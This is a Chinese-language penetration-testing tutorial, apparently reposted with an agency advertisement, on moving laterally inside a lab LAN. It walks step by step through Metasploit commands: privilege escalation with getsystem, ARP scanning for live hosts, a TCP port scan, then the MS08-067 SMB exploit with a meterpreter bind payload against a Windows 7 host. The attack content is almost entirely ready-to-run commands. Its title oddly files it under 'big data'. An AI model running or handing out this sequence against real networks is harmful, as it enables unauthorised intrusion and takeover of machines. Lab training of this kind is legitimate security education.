大数据中如何获取内网中其他主机权限,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
创新互联专注为客户提供全方位的互联网综合服务,包含不限于成都网站制作、成都网站设计、贡嘎网络推广、微信平台小程序开发、贡嘎网络营销、贡嘎企业策划、贡嘎品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;创新互联为所有大学生创业者提供贡嘎建站搭建服务,24小时服务热线:028-86922220,官方网址:www.cdcxhl.com
环境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.144
小小受:win7 x64 ,ip: 192.168.1.130
一、生成木马及监听主机参考上篇文章:
内网渗透 -- 提升权限(利用提权漏洞)
二、获取小受的IP地址
meterpreter > getsystem
三、获取内网中存活的主机,以一台win03主机为例
meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24
四、端口扫描,看看小小受开放了那些端口
1、选择用到的模块:
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
2、查看需要配置的参数:
show options
3、设置要扫描的端口:
msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306
4、设置小小受ip地址:
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130
5、执行:
msf5 auxiliary(scanner/portscan/tcp) > run
五、利用ms08_067漏洞拿下小小受
1、搜索ms08_067模块信息
msf5 auxiliary(scanner/portscan/tcp) > search ms08_067
2、选择该模块并设置payload
msf5 > use exploit/windows/smb/ms08_067_netapimsf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
3、查看需要配置的参数:
msf5 exploit(windows/smb/ms08_067_netapi) > show options
4、设置目标主机并执行
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130msf5 exploit(windows/smb/ms08_067_netapi) > run
关于大数据中如何获取内网中其他主机权限问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注创新互联行业资讯频道了解更多相关知识。